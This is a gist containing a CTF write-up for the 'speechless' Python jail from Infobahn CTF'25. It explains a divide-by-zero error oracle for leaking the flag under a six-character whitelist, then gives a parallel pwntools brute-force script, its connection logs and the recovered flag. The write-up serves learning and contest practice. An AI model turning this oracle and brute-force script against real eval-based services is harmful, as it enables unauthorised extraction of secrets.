Skip to content

Instantly share code, notes, and snippets.

@ky28059

ky28059/Infobahn CTF'25 speechless writeup.md

Created November 8, 2025 20:33
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save ky28059/5c472714977ab8e82bfff6c8aba5a97f to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save ky28059/5c472714977ab8e82bfff6c8aba5a97f to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Infobahn CTF'25 speechless writeup.md

Infobahn CTF'25 — speechless

wow i'm in jail??? i'm speechless...

nc speechless.challs.infobahnc.tf 1337

We're given a Python server that looks like this:

#!/usr/bin/python3

allowed = "ab.=-/"

with open("flag.txt", 'rb') as f:
    flag = f.read()

a = None
while True:
    expr = input(">>> ")

    if not all(char in allowed for char in expr):
        print('you need to try harder')
        continue

    if any(f"{blocked}==" in expr or f"=={blocked}" in expr for blocked in "ab"):
        print('stop comparing the flag')
        continue

    try:
        a = eval(expr, {"a": a} | {"b" * (index + 1): char for index, char in enumerate(flag)})
    except:
        a = None
        print('stop breaking things >:(')

We're given a strange eval environment with a stateful a variable, and a bunch of b vars such that b is the first byte of the flag, bb is the second byte, and so on.

Note that we can only use ab.=-/ as characters, and the only information we can leak is when our eval throws an error.

Then, the key idea is this: we can use the except: handler as an error oracle so long as we can throw an error if and only if a b variable matches our guess. One way to do this is to conditionally trigger a divide by 0 exception:

  • Evaluate b/b -> a = 1
  • Evaluate b - a, which will set a = 0 if b = 1, or a > 0 otherwise.
  • Evaluate b / a, which will throw an error iff a = 0 in the previous step; this tells us if b = 1.

We can repeat those steps to query b - a - a - ... for any value of b, and we can swap b for bb, bbb, etc. to query each of the other characters of the flag.

For whatever reason, each query takes a decent amount of time on remote, making a character-by-character approach take a bit of time. To expedite the process, we can query how many characters are in the flag by repeatedly setting a = bbb... until we hit a NameError for referencing an undefined variable:

ky28059@ky28059:~$ nc speechless.challs.infobahnc.tf 1337
== proof-of-work: disabled ==
>>> b
>>> bb
>>> bbb
>>> bbbb
...
>>> bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
>>> bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
>>> bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
>>> bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
stop breaking things >:(

so the last valid index is 55. Once we know that, here's a script that brute forces each character of the flag simultaneously by spawning 55 processes:

from multiprocessing import Pool

import pwn


def query(conn, index, val):
    conn.sendline(b'b/b')  # a is 1
    conn.recvuntil(b'>>>')
    conn.sendline(b'b' * index + b'-a' * val)  # a = bbb - val
    conn.recvuntil(b'>>>')
    conn.sendline(b'b/a')  # a = b / (bbb - val)
    res = conn.recvuntil(b'>>>').decode()
    return 'stop breaking things >:(' in res


def try_char(index):
    conn = pwn.remote('speechless.challs.infobahnc.tf', 1337)
    conn.recvuntil(b'>>>')

    for j in range(32, 128):
        if query(conn, index, j):
            return j


if __name__ == '__main__':
    a = Pool(processes=55).map(try_char, range(1, 55))
    print(a)
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[x] Opening connection to speechless.challs.infobahnc.tf on port 1337: Trying 34.14.220.218
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[+] Opening connection to speechless.challs.infobahnc.tf on port 1337: Done
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[*] Closed connection to speechless.challs.infobahnc.tf port 1337
[105, 110, 102, 111, 98, 97, 104, 110, 123, 105, 95, 99, 97, 110, 39, 116, 95, 98, 101, 108, 105, 101, 118, 101, 95, 105, 95, 117, 115, 101, 100, 95, 101, 108, 108, 105, 112, 115, 105, 115, 95, 105, 110, 95, 97, 95, 106, 97, 105, 108, 95, 46, 46, 46]

Process finished with exit code 0

and we get the flag:

>>> ''.join([chr(x) for x in [105, 110, 102, 111, 98, 97, 104, 110, 123, 105, 95, 99, 97, 110, 39, 116, 95, 98, 101, 108, 105, 101, 118, 101, 95, 105, 95, 117, 115, 101, 100, 95, 101, 108, 108, 105, 112, 115, 105, 115, 95, 105, 110, 95, 97, 95, 106, 97, 105, 108, 95, 46, 46, 46]])
"infobahn{i_can't_believe_i_used_ellipsis_in_a_jail_..."

(there was an off-by-one in the script, but luckily we know the last character is } 😅)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment